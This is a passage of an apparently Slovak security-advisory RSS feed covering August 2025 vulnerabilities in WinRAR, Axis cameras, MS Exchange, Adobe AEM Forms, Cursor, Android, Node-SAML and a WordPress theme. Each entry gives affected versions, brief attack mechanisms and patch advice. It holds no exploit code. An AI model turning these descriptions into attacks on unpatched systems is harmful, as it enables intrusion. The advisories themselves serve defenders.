<li><a href="https://www.neerajlovecyber.com/news/win-ddos-flaws-turn-domain-controllers-botnets">https://www.neerajlovecyber.com/news/win-ddos-flaws-turn-domain-controllers-botnets</a></li>



<li><a href="https://www.helpnetsecurity.com/2025/08/11/win-ddos-domain-controllers-ddos-vulnerability-cve-2025-32724/">https://www.helpnetsecurity.com/2025/08/11/win-ddos-domain-controllers-ddos-vulnerability-cve-2025-32724/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2655/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktualizácia nástroja WinRAR opravila aktívne zneužívanú zero-day zraniteľnosť</title>
		<link>/posts/2651</link>
					<comments>/posts/2651#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 12 Aug 2025 09:32:42 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[WinRAR]]></category>
		<guid isPermaLink="false">/?p=2651</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/06/winrar.png" alt="" /></p>Vývojári archivačného nástroja WinRAR vydali bezpečnostnú aktualizáciu svojho produktu, ktorá opravuje závažnú bezpečnostnú zraniteľnosť CVE-2025-8088. Táto zraniteľnosť je často zneužívaná...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/06/winrar.png" alt="" /></p>
<p><strong>Vývojári archivačného nástroja WinRAR vydali bezpečnostnú aktualizáciu svojho produktu, ktorá opravuje závažnú bezpečnostnú zraniteľnosť CVE-2025-8088. Táto zraniteľnosť je často zneužívaná vo&nbsp;phishingových kampaniach na distribúciu škodlivého kódu.&nbsp;</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WinRAR všetky verzie po 7.12 pre Windows</li>



<li>UnRAR 7.0 pre Windows</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-8088</strong> (CVSS-B 4.0 skóre 8,4)</p>



<p>Závažná bezpečnostná zraniteľnosť umožňuje útočníkom vykonať neoprávnené prechádzanie adresármi, ktoré využívajú na rozbalenie škodlivého kódu do adresára „Startup“. Jeho obsah sa automaticky spustí s&nbsp;administratívnymi privilégiami pri ďalšom štarte počítača.</p>



<p>Zraniteľnosť objavili bezpečnostní výskumníci Anton Cherepanov, Peter Košinár a Peter Strýček zo spoločnosti ESET.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Vykonanie škodlivého kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizáciu na verziu WinRAR 7.13. Pre nástroj príkazového riadka UnRAR v&nbsp;dobe publikácie článku, nie je zverejnený žiadny návod na mitigáciu.</p>



<p><strong>Indikátory kompromitácie:</strong></p>



<p>Odporúčame dôkladne prezrieť obsah adresára „Startup“  s adresou:<br><br><code>%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup (Local to user)</code><br><code>%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp (Machine-wide)</code></p>



<p>Za pozornosť stoja súbory alebo odkazy s&nbsp;neznámym pôvodom alebo účelom pre daný systém.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-8088">https://nvd.nist.gov/vuln/detail/CVE-2025-8088</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploited-by-romcom-hackers-in-phishing-attacks/">https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploited-by-romcom-hackers-in-phishing-attacks/</a></li>



<li><a href="https://thehackernews.com/2025/08/winrar-zero-day-under-active.html">https://thehackernews.com/2025/08/winrar-zero-day-under-active.html</a></li>



<li><a href="https://www.helpnetsecurity.com/2025/08/11/winrar-zero-day-cve-2025-8088/">https://www.helpnetsecurity.com/2025/08/11/winrar-zero-day-cve-2025-8088/</a></li>



<li><a href="https://www.rarlab.com/rar_add.htm">https://www.rarlab.com/rar_add.htm</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2651/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v kamerách od Axis Communications dovoľuje vzdialené vykonávanie kódu</title>
		<link>/posts/2646</link>
					<comments>/posts/2646#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 11 Aug 2025 06:14:25 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Axis Communications]]></category>
		<category><![CDATA[kamery]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2646</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/08/Axis_Communications_logo.svg_-2-1024x628.png" alt="" /></p>Bezpečnostní výskumníci z Claroty Team82 zverejnili informácie o zraniteľnostiach produktov spoločnosti Axis Communications z ktorých jedna CVE-2025-30023 je kritická a...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/08/Axis_Communications_logo.svg_-2-1024x628.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci z Claroty Team82 zverejnili informácie o zraniteľnostiach produktov spoločnosti Axis Communications z ktorých jedna CVE-2025-30023 je kritická a môže byť použitá na útok na serverovú aj klientskú stranu nasadených produktov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Axis Camera Station Pro 6.9</li>



<li>Axis Camera Station 5.58</li>



<li>Axis Device Manager 5.32</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-30023 </strong>(CVSS 3.1 skóre 9.0)</p>



<p>Kritická bezpečnostná zraniteľnosť sa nachádza v proprietárnom protokole Axis.Remoting. Potenciálny vzdialený útočník môže úspešným zneužitím setu exploitov zraniteľností obísť autentifikáciu a získať prístup na úrovni systému.</p>



<p>Zraniteľnosti sú nebezpečné pre produkty ako Axis Device Manager, ktorý organizácie používajú na správu svojich zariadení Axis, ako aj k softvéru Axis Camera Station, ktorý umožňuje koncovým používateľom prístup k videoprenosu z kamier.</p>



<p>Pre proprietárny protokol sú potenciálne zraniteľné zariadenia ľahko vyhladateľné cez známe služby, ktoré skenujú internet. V&nbsp;deň, keď boli zraniteľnosti a&nbsp;ich oprava publikovaná sa na internete nachádzalo viac ako 6500 potenciálne zraniteľných zariadení.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Úplné narušenie dôvernosti, integrity a dostupnosti systému</strong></li>



<li><strong>Zníženie úrovne zabezpečenia objektu monitorovaného zraniteľnými zariadeniami</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a používateľom odporúčame vykonať aktualizáciu zasiahnutých systémov na verzie:</p>



<ul>
<li>AXIS Camera Station Pro 6.9</li>



<li>AXIS Camera Station 5.58</li>



<li>AXIS Device Manager 5.32</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-30024">https://nvd.nist.gov/vuln/detail/CVE-2025-30024</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-30023">https://nvd.nist.gov/vuln/detail/CVE-2025-30023</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-30025">https://nvd.nist.gov/vuln/detail/CVE-2025-30025</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-30026">https://nvd.nist.gov/vuln/detail/CVE-2025-30026</a></li>



<li><a href="https://www.axis.com/dam/public/9b/a5/72/cve-2025-30023pdf-en-US-485733.pdf">https://www.axis.com/dam/public/9b/a5/72/cve-2025-30023pdf-en-US-485733.pdf</a></li>



<li><a href="https://claroty.com/team82/research/turning-camera-surveillance-on-its-axis">https://claroty.com/team82/research/turning-camera-surveillance-on-its-axis</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2646/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft vydal usmernenie k závažnej zraniteľnosti v hybridných nasadeniach MS Exchange</title>
		<link>/posts/2638</link>
					<comments>/posts/2638#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 08 Aug 2025 13:46:47 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Microsoft]]></category>
		<guid isPermaLink="false">/?p=2638</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/08/exchange-1024x793.jpg" alt="" /></p>Spoločnosť Microsoft vydala usmernenie pre mitigáciu bezpečnostnej zraniteľnosti CVE-2025-53786 s vysokou závažnosťou pre svoj produkt MS Exchange. Zatiaľ nebolo detegované...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/08/exchange-1024x793.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala usmernenie pre mitigáciu bezpečnostnej zraniteľnosti CVE-2025-53786 s vysokou závažnosťou pre svoj produkt MS Exchange. Zatiaľ nebolo detegované aktívne zneužívanie zraniteľnosti, avšak Microsoft varuje, že zneužitie je ťažko detekovateľné. &nbsp;</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Microsoft Exchange Server Subscription Edition RTM hybridné prostredie</li>



<li>Microsoft Exchange Server 2019 hybridné prostredie</li>



<li>Microsoft Exchange Server 2016 hybridné prostredie</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-53786 </strong>(CVSS 3.1 skóre 8.0)</p>



<p>Bezpečnostná zraniteľnosť ovplyvňuje hybridné nasadenia servera Microsoft Exchange. Potenciálny útočník s prístupom k lokálnemu (on-premise) serveru MS Exchange s oprávneniami správcu môže eskalovať svoje oprávnenia v pripojenom cloudovom prostredí. Táto chyba existuje z dôvodu, že server Exchange Server a Exchange Online zdieľajú rovnakú identitu &#8220;service principal&#8221; v hybridných konfiguráciách. Úspešné zneužitie zraniteľnosti vedie k&nbsp;celkovej kompromitácií cloudového prostredia organizácie.</p>



<p>Microsoft upozorňuje, že služba „Shared service principal“ na ktorú sa vzťahuje aj aktuálna zraniteľnosť je zastaraná a bude vypnutá k&nbsp;31.10.2025 a&nbsp;organizácie, ktoré dovtedy neprejdú na „Dedicated Exchange hybrid app“ stratia hybridnú funkcionalitu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k citlivým údajom&nbsp;&nbsp;</strong></li>



<li><strong>Kompromitácia cloudovej infraštruktúry organizácie&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</strong></li>



<li><strong>Nedostupnosť služieb (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame:</p>



<ul>
<li>Aktualizovať produkt na najnovšiu verziu (hotfix) <a href="https://techcommunity.microsoft.com/blog/exchange/released-april-2025-exchange-server-hotfix-updates/4402471">(návod)</a></li>



<li>Postupovať podľa zmien v&nbsp;nasadení hybridných prostredí (<a href="https://techcommunity.microsoft.com/blog/exchange/exchange-server-security-changes-for-hybrid-deployments/4396833">návod</a>)</li>



<li>Nasadiť vyhradenú hybridnú aplikáciu Exchange (<a href="https://learn.microsoft.com/en-gb/Exchange/hybrid-deployment/deploy-dedicated-hybrid-app#how-to-enable-the-dedicated-exchange-hybrid-application-feature-via-setting-override">návod</a>)</li>



<li>Resetovať „keyCredentials“ služby Service principal (<a href="https://learn.microsoft.com/en-gb/Exchange/hybrid-deployment/deploy-dedicated-hybrid-app#service-principal-clean-up-mode">návod</a>)</li>
</ul>



<p><strong>Zdroje</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53786">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53786</a></li>



<li><a href="https://www.cisa.gov/news-events/directives/ed-25-02-mitigate-microsoft-exchange-vulnerability">https://www.cisa.gov/news-events/directives/ed-25-02-mitigate-microsoft-exchange-vulnerability</a></li>



<li><a href="https://www.cisa.gov/news-events/alerts/2025/08/06/microsoft-releases-guidance-high-severity-vulnerability-cve-2025-53786-hybrid-exchange-deployments">https://www.cisa.gov/news-events/alerts/2025/08/06/microsoft-releases-guidance-high-severity-vulnerability-cve-2025-53786-hybrid-exchange-deployments</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/cisa-orders-fed-agencies-to-patch-new-cve-2025-53786-exchange-flaw/">https://www.bleepingcomputer.com/news/security/cisa-orders-fed-agencies-to-patch-new-cve-2025-53786-exchange-flaw/</a></li>



<li><a href="https://www.helpnetsecurity.com/2025/08/07/exchange-hybrid-deployment-vulnerability-cve-2025-53786/">https://www.helpnetsecurity.com/2025/08/07/exchange-hybrid-deployment-vulnerability-cve-2025-53786/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2638/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zero-day zraniteľnosti v produkte Adobe Experience Manager Forms on JEE</title>
		<link>/posts/2635</link>
					<comments>/posts/2635#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 07 Aug 2025 10:33:02 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2635</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoj produkt Adobe Experience Manager (AEM) Forms on JEE, ktoré opravujú dve kritické zero-day...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>
<p><strong>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoj produkt Adobe Experience Manager (AEM) Forms on JEE, ktoré opravujú dve kritické zero-day zraniteľnosti. Zraniteľnosti možno zneužiť na získanie neoprávneného prístupu k&nbsp;citlivým údajom, vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Adobe Experience Manager (AEM) Forms on JEE vo verziách starších ako 6.5.0-0108</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-54253 </strong>(CVSS skóre 10,0)</p>



<p>Kritická zraniteľnosť spočíva miskonfigurácii administratívneho rozhrania, ktorá ponecháva aktívny vývojársky režim Struts. Zraniteľnosť možno zneužiť na <strong>vzdialené vykonanie kódu</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>CVE-2025-54254 </strong>(CVSS skóre 8,6)</p>



<p>Zraniteľnosť spočíva v&nbsp;nesprávnej reštrikcii externých referencií v&nbsp;rámci spracovávaných XML dokumentov. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na realizáciu <strong>XXE (XML External Entity) útokov</strong> a&nbsp;<strong>čítanie obsahu súborov na súborovom systéme</strong>.</p>



<p><strong>Pozn.: Na uvedené zraniteľnosti je v&nbsp;súčasnosti dostupný tzv. Proof of Concept kód demonštrujúci návod ich zneužitia.</strong></p>



<p>Bližšie informácie o&nbsp;zraniteľnostiach môžete nájsť na stránkach bezpečnostných výskumníkov zo spoločnosti <a href="https://slcyber.io/assetnote-security-research-center/struts-devmode-in-2025-critical-pre-auth-vulnerabilities-in-adobe-experience-manager-forms/">Searchlight Cyber</a>, ktorí predmetnú zraniteľnosť objavili.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať bezodkladnú aktualizáciu AEM Forms on JEE na verziu 6.5.0-0108. <a href="https://experienceleague.adobe.com/en/docs/experience-manager-65/content/forms/troubleshooting/mitigating-xxe-and-configuration-vulnerabilities-for-experience-manager-forms-jee">Detailný návod</a> na inštaláciu záplat v&nbsp;závislosti od používanej verzie produktu môžete nájsť online na stránke výrobcu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://helpx.adobe.com/security/products/aem-forms/apsb25-82.html">https://helpx.adobe.com/security/products/aem-forms/apsb25-82.html</a></li>



<li><a href="https://experienceleague.adobe.com/en/docs/experience-manager-65/content/forms/troubleshooting/mitigating-xxe-and-configuration-vulnerabilities-for-experience-manager-forms-jee">https://experienceleague.adobe.com/en/docs/experience-manager-65/content/forms/troubleshooting/mitigating-xxe-and-configuration-vulnerabilities-for-experience-manager-forms-jee</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/adobe-issues-emergency-fixes-for-aem-forms-zero-days-after-pocs-released/">https://www.bleepingcomputer.com/news/security/adobe-issues-emergency-fixes-for-aem-forms-zero-days-after-pocs-released/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2635/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažná zraniteľnosť v Cursor AI IDE</title>
		<link>/posts/2632</link>
					<comments>/posts/2632#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 07 Aug 2025 10:30:19 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cursor AI]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2632</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/08/1_Q7bOeukT7Ll3egoTVqk8Tg-1024x557.jpg" alt="" /></p>Vývojári AI editora kódu Cursor vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-54136 možno zneužiť na vzdialené vykonanie kódu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/08/1_Q7bOeukT7Ll3egoTVqk8Tg-1024x557.jpg" alt="" /></p>
<p><strong>Vývojári AI editora kódu Cursor vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-54136 možno zneužiť na vzdialené vykonanie kódu a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong><strong></strong></p>



<ul>
<li>Cursor vo verziách starších ako 1.3</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong><strong></strong></p>



<p><strong>CVE-2025-54136 </strong>(CVSS 3.1 skóre: 7,2)</p>



<p>Zraniteľnosť známa aj pod aliasom MCPoison spočíva v&nbsp;mechanizme spracovania zmien konfigurácie MCP (Model Context Protocol) serverov. Zraniteľnosť možno modifikáciou konfiguračných súborov na zariadení obete alebo v&nbsp;rámci používaných GitHub repozitárov zneužiť na <strong>vzdialené vykonanie kódu</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>. <a href="https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/">Bližšie informácie</a> o&nbsp;zraniteľnosti môžete nájsť online v&nbsp;analýze od spoločnosti CheckPoint.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong><strong></strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;vývojárom odporúčame vykonať bezodkladnú aktualizáciu Cursor na verziu 1.3. Rovnako odporúčame limitovať spojenia len na dôveryhodné MCP servery.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://github.com/cursor/cursor/security/advisories/GHSA-24mc-g4xr-4395">https://github.com/cursor/cursor/security/advisories/GHSA-24mc-g4xr-4395</a></li>



<li><a href="https://thehackernews.com/2025/08/cursor-ai-code-editor-vulnerability.html">https://thehackernews.com/2025/08/cursor-ai-code-editor-vulnerability.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2632/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Google opravil aktívne zneužívané zraniteľnosti operačného systému Android</title>
		<link>/posts/2629</link>
					<comments>/posts/2629#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 07 Aug 2025 10:27:04 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2629</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/08/Android_operating_system-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj operačný systém Andorid, ktoré opravujú 6 zraniteľností, z čoho 1 je označená ako...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/08/Android_operating_system-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj operačný systém Andorid, ktoré opravujú 6 zraniteľností, z čoho 1 je označená ako kritická a 2 ako aktívne zneužívané. Aktívne zneužívané CVE-2025-21479 a CVE-2025-27038 v&nbsp;komponentoch Qualcomm možno zneužiť na poškodenie obsahu pamäte.</strong></p>



<p><strong>Zraniteľné systémy:</strong><strong></strong></p>



<ul>
<li>Zariadenia s&nbsp;operačným systémom Android bez aktualizácie z&nbsp;05.08.2025</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong><strong></strong></p>



<p><strong><u>Kritická zraniteľnosť:</u></strong><strong><u></u></strong></p>



<p><strong>CVE-2025-48530&nbsp; </strong>(CVSS 3.1 skóre: 8,6)</p>



<p>Kritická zraniteľnosť sa nachádza v&nbsp;komponente System a&nbsp;možno ju zneužiť <strong>na vzdialené vykonanie kódu</strong>.</p>



<p><strong><u>Aktívne zneužívané zraniteľnosti:</u></strong><strong><u></u></strong></p>



<p><strong>CVE-2025-21479 &nbsp;</strong>(CVSS 3.1 skóre: 8,6)</p>



<p>Nesprávnu autorizáciu v&nbsp;rámci komponentu Qualcomm Graphics možno zneužiť na <strong>neoprávnené vykonanie príkazov</strong> v&nbsp;mikrokóde GPU a&nbsp;následné <strong>poškodenie obsahu pamäte</strong>.</p>



<p><strong>CVE-2025-27038 </strong>(CVSS 3.1 skóre: 7,5)</p>



<p>CVE-2025-27038 v Qualcomm Graphics spočíva v použití odalokovaného miesta v pamäti a možno ju zneužiť na <strong>poškodenie obsahu pamäte</strong>.</p>



<p><strong><u>Ostatné zraniteľnosti:</u></strong><strong><u></u></strong></p>



<p>Vysoko závažné zraniteľnosti v&nbsp;komponente Framework (CVE-2025-22441, CVE-2025-48533) možno zneužiť na <strong>eskaláciu privilégií</strong>. Zneužitie zraniteľností vyžaduje interakciu zo strany používateľa.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong><strong></strong></li>



<li><strong>Eskalácia privilégií</strong><strong></strong></li>



<li><strong>Neoprávnená zmena v systéme</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať bezodkladnú inštaláciu aktualizácií operačného systému Android z&nbsp;5. augusta 2025.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://source.android.com/docs/security/bulletin/2025-08-01">https://source.android.com/docs/security/bulletin/2025-08-01</a></li>



<li><a href="https://feedly.com/cve/CVE-2025-48530">https://feedly.com/cve/CVE-2025-48530</a></li>



<li><a href="https://thehackernews.com/2025/08/google-fixes-3-android-vulnerabilities.html">https://thehackernews.com/2025/08/google-fixes-3-android-vulnerabilities.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2629/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v JavaScript balíčku Node-SAML</title>
		<link>/posts/2626</link>
					<comments>/posts/2626#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 04 Aug 2025 13:47:43 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=2626</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/npm-1024x655.png" alt="" /></p>Vývojári knižnice Node-SAML vydali bezpečnostnú aktualizáciu svojho produktu, ktorá opravuje kritickú bezpečnostnú zraniteľnosť vo verifikáci kryptografických podpisov, čo môže spôsobiť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/npm-1024x655.png" alt="" /></p>
<p><strong>Vývojári knižnice Node-SAML vydali bezpečnostnú aktualizáciu svojho produktu, ktorá opravuje kritickú bezpečnostnú zraniteľnosť vo verifikáci kryptografických podpisov, čo môže spôsobiť neautorizovaný prístup k&nbsp;citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Balíček Node-SAML všetky verzie do 5.0.1</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-54419 </strong>(CVSS 3.1 skóre 10.0)</p>



<p>Bezpečnostná zraniteľnosť spočíva v nedostatočnej implementácii bezpečnostných mechanizmov. Počas autentifikácie sú SAML odpovede digitálne podpísané poskytovateľom identity (IdP). V postihnutých verziách Node-SAML aplikácia načítava a dôveruje častiam SAML odpovede z nepodpísanej časti dokumentu, čím umožňuje vzdialenému, neautentifikovanému útočníkovi overenie digitálneho podpisu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Úplne narušenie dôveryhodnosti systému</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neautorizovaný prístup k&nbsp;citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom zraniteľnej verzie balíčku sa odporúča okamžitá aktualizácia na verziu 5.1.0 v&nbsp;ktorej je zraniteľnosť opravená.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-54419">https://nvd.nist.gov/vuln/detail/CVE-2025-54419</a></li>



<li><a href="https://dec-solutions.com/cve-2025-54419-node-saml-saml-assertion-tampering/">https://dec-solutions.com/cve-2025-54419-node-saml-saml-assertion-tampering/</a></li>



<li><a href="https://zeropath.com/blog/cve-2025-54419-node-saml-authentication-bypass">https://zeropath.com/blog/cve-2025-54419-node-saml-authentication-bypass</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2626/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická aktívne zneužívaná zraniteľnosť vo WordPress doplnku Alone</title>
		<link>/posts/2624</link>
					<comments>/posts/2624#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 04 Aug 2025 13:19:54 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=2624</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>WordPress webstránky využívajúce tému menom Alone, sú aktívne zneužívané na vzdialené vykonávanie škodlivého kódu cez kritickú zraniteľnosť. Toto zneužitie bolo...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>
<p><strong>WordPress webstránky využívajúce tému menom Alone, sú aktívne zneužívané na vzdialené vykonávanie škodlivého kódu cez kritickú zraniteľnosť. Toto zneužitie bolo detegované už vo viac ako 120 tisíc prípadoch.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Téma Alone všetky verzie po 7.8.3</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE-2025-5394 </strong>(CVSS 3.1 skóre 9.8)</p>



<p>Webstránky využívajúce túto tému sú napádané cez nevyžiadané nahrávanie súboru, kvôli chýbajúcej funkcionalite nonce overenia vo funkcii <em>alone_import_pack_install_plugin()</em>. Týmto umožňuje pluginu inštaláciu cez AJAX a&nbsp;akceptuje URL adresu vzdialeného zdroja v POST dátach, čo umožňuje neautentifikovaným používateľom spustiť sťahovanie doplnkov zo vzdialených URL adries. Toto je znežívané na sťahovanie zip archívov obsahujúcich škodlivý kód.</p>



<p><strong>Možné škody:</strong></p>



<ul>
